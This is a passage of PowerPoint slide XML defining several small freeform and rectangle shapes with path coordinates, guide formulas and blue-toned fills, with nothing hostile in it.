              <a:gd name="T36" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T37" fmla="*/ 2147483647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90"/>
              <a:gd name="T59" fmla="*/ 24 w 24"/>
              <a:gd name="T60" fmla="*/ 90 h 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90">
                <a:moveTo>
                  <a:pt x="24" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="59B2FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10359" name="Freeform 440"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1733550" y="6904038"/>
            <a:ext cx="42862" cy="171450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T1" fmla="*/ 0 h 76"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T3" fmla="*/ 0 h 76"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T26" fmla="*/ 0 w 19"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T28" fmla="*/ 0 w 19"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T30" fmla="*/ 0 w 19"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 76"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T35" fmla="*/ 0 h 76"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 19"/>
              <a:gd name="T37" fmla="*/ 0 h 7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76"/>
              <a:gd name="T59" fmla="*/ 19 w 19"/>
              <a:gd name="T60" fmla="*/ 76 h 7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76">
                <a:moveTo>
                  <a:pt x="19" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="72C6FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10360" name="Freeform 441"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1736725" y="6916738"/>
            <a:ext cx="34925" cy="142875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T1" fmla="*/ 0 h 63"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T24" fmla="*/ 0 w 15"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T26" fmla="*/ 0 w 15"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T28" fmla="*/ 0 w 15"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T30" fmla="*/ 0 w 15"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 63"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T35" fmla="*/ 0 h 63"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 15"/>
              <a:gd name="T37" fmla="*/ 0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63"/>
              <a:gd name="T59" fmla="*/ 15 w 15"/>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63">
                <a:moveTo>
                  <a:pt x="15" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="8CD8FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10361" name="Freeform 442"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1736725" y="6931025"/>
            <a:ext cx="28575" cy="112713"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T28" fmla="*/ 0 w 12"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 50"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T35" fmla="*/ 0 h 50"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 5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50"/>
              <a:gd name="T59" fmla="*/ 12 w 12"/>
              <a:gd name="T60" fmla="*/ 50 h 5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50">
                <a:moveTo>
                  <a:pt x="12" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A5EDFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10362" name="Freeform 443"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1739900" y="6946900"/>
            <a:ext cx="20637" cy="80963"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T1" fmla="*/ 0 h 36"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T3" fmla="*/ 0 h 36"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T26" fmla="*/ 0 w 9"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T28" fmla="*/ 0 w 9"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T30" fmla="*/ 0 w 9"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 36"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T35" fmla="*/ 0 h 36"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T37" fmla="*/ 0 h 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36"/>
              <a:gd name="T59" fmla="*/ 9 w 9"/>
              <a:gd name="T60" fmla="*/ 36 h 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36">
                <a:moveTo>
                  <a:pt x="9" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10363" name="Rectangle 444"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1462087" y="6924675"/>
            <a:ext cx="9525" cy="265113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:no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364" name="Freeform 445"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1557337" y="6919913"/>
            <a:ext cx="103188" cy="123825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T8" fmla="*/ 0 w 46"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T10" fmla="*/ 0 w 46"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T12" fmla="*/ 0 w 46"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T14" fmla="*/ 0 w 46"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T81" fmla="*/ 0 h 55"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T83" fmla="*/ 0 h 55"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T85" fmla="*/ 0 h 55"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 46"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 55"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 46"/>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6"/>
              <a:gd name="T148" fmla="*/ 0 h 55"/>
              <a:gd name="T149" fmla="*/ 46 w 46"/>
              <a:gd name="T150" fmla="*/ 55 h 5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6" h="55">
                <a:moveTo>
                  <a:pt x="4" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
